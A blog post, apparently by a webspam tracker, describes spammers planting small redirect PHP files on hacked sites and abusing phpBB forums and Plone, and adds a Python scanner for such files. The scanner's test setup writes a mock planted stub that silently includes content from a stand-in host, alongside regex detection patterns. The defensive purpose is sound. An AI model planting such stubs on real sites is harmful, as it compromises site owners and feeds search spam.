Spammy redirects

While tracking webspammers, I’ve seen more and more use of redirects from whatever webservice the spammers can utilize. That includes Blogspot, free phpBB forum sites, Plone, and even hacked websites.

Basically, whatever they can use, they will.

We’re getting used to free services being used for redirects, but when they start turning our own websites against us, it’s time to wake up.

Hacked websites

Vizaweb webhosting recently warned their customers that hackers had been sniffing FTP passwords. Customers were directed to use only secure ways to log in, and to change their passwords. Lots of them didn’t, and got their websites broken into. The normal operation of the websites didn’t change, so the website owners had no idea anything was wrong.

In the meantime, the hackers had placed php files in existing directories off the root that served up spammy redirect pages using includes (pulling the content in from the spammer’s site). The php files were only about 1 Kb in size, so easy to overlook. They’d be named read.php, wp-read.php, rss.php or something else innocuous. Some scripts even included code to suppress any errors generated. The files would be called with keywords added (?q=keyword) that created the spammy redirect files. The spammers led search engines to these files by comment spamming guestbooks and blogs. Suddenly the spammers had redirect files on (maybe) high PR sites or even authority sites. Sites that were previously above reproach.

We found the spammers through the cutouts they redirected through (on the way to PPC programs), and through reading the raw php files supplied by the website owners. One even told us his root index.php file had been replaced. As far as we could tell from casual inspection, the doctored index.php file was calling up a Webattacker installation. The site thus compromised was a busy community site…
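
One way to act on the description above is to sweep the web root for small PHP files that pull content from a remote URL. This is an added example, not code from the original post; the size threshold, the patterns and the sample files (including the spam.example host) are assumptions constructed for illustration.

```python
import os
import re
import tempfile

MAX_SIZE = 2048  # bytes; assumption based on the "about 1 Kb" files described above
CHECKS = {
    "remote include/fetch": re.compile(
        rb"""\b(?:include|require)(?:_once)?\b\s*\(?\s*["']https?://"""
        rb"""|\b(?:file_get_contents|readfile|fopen|file)\s*\(\s*["']https?://""", re.I),
    "error suppression": re.compile(
        rb"error_reporting\s*\(\s*0\s*\)|display_errors"
        rb"|@\s*(?:include|require|file_get_contents|readfile|fopen)", re.I),
    "reads ?q= keyword": re.compile(rb"""\$_(?:GET|REQUEST)\s*\[\s*["']q["']\s*\]"""),
}

def scan(root):
    """Return {relative_path: [reasons]} for small PHP files that pull remote content."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if not name.lower().endswith(".php") or os.path.getsize(path) > MAX_SIZE:
                continue
            with open(path, "rb") as fh:
                body = fh.read()
            reasons = [label for label, rx in CHECKS.items() if rx.search(body)]
            # Report only files that fetch remote content; other hits are supporting evidence.
            if "remote include/fetch" in reasons:
                findings[os.path.relpath(path, root)] = reasons
    return findings

def build_sample_tree(root):
    """Constructed sample files: one planted redirect stub, one ordinary script."""
    os.makedirs(os.path.join(root, "images"))
    with open(os.path.join(root, "images", "wp-read.php"), "w") as fh:
        fh.write('<?php error_reporting(0);\n'
                 '@include("http://spam.example/page.php?k=" . urlencode($_GET["q"]));\n')
    with open(os.path.join(root, "contact.php"), "w") as fh:
        fh.write('<?php include("header.php"); echo "Contact us"; ?>\n')

def demo():
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        return scan(root)

if __name__ == "__main__":
    for path, reasons in demo().items():
        print(path, "->", ", ".join(reasons))
```

Treat every hit as a candidate for manual review: a legitimate small script that fetches a remote feed will match too, and a stub that builds its URL from obfuscated pieces will not.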

Free phpBB forums

There’s a jungle of free phpBB forum services out there, and the spammers have figured out a way to make redirects. They insert code in the forum descriptions. That way the redirect works from the front page of the forum. Luckily, there’s an easy solution that all free phpBB forum providers can implement (and many have), discovered by Pickaforum’s admin:

[Image: phpBB redirect fix]
(Note: this was squished together to make the graphic. The code is on one line.)

The developers of Plone have released new versions and encourage users to upgrade. I’d like to add that if I had a Plone installation, I’d prepare a robots.txt file that directed search engine spiders to not go near the Member directory. That way, if the spammers managed to upload spammy pages, redirects or not, they wouldn’t embarrass me in the search engines.

Like this:

User-agent: *
Disallow: /Members/

Never ending arms race

The spammers are continually looking for susceptible software and web services they can use to redirect. They try to stay two steps ahead of us.

The spammers keep changing their redirect javascripts. The goal is to hide them from website and web service owners, so the pages don’t get deleted, or to create code that will work even when straight code would be blocked. To do that, they obfuscate the code. There are myriad ways of doing that, from simply chopping up the words to using charcode or changing the charcode so it doesn’t look like charcode. Whatever can be put together again by a browser, they will use.

We recently had a long discussion with a bunch of spammers. They see us “antis” as deplorable human beings who persecute them for no reason. They seem to think what they’re doing is laudable. Basically, they’ll continue looking for ways to turn our websites against us, in the race to earn money for their “starving children”. The spamming is not going to stop.

So check your site statistics for anything unusual, check your raw logs, and upgrade your php apps regularly.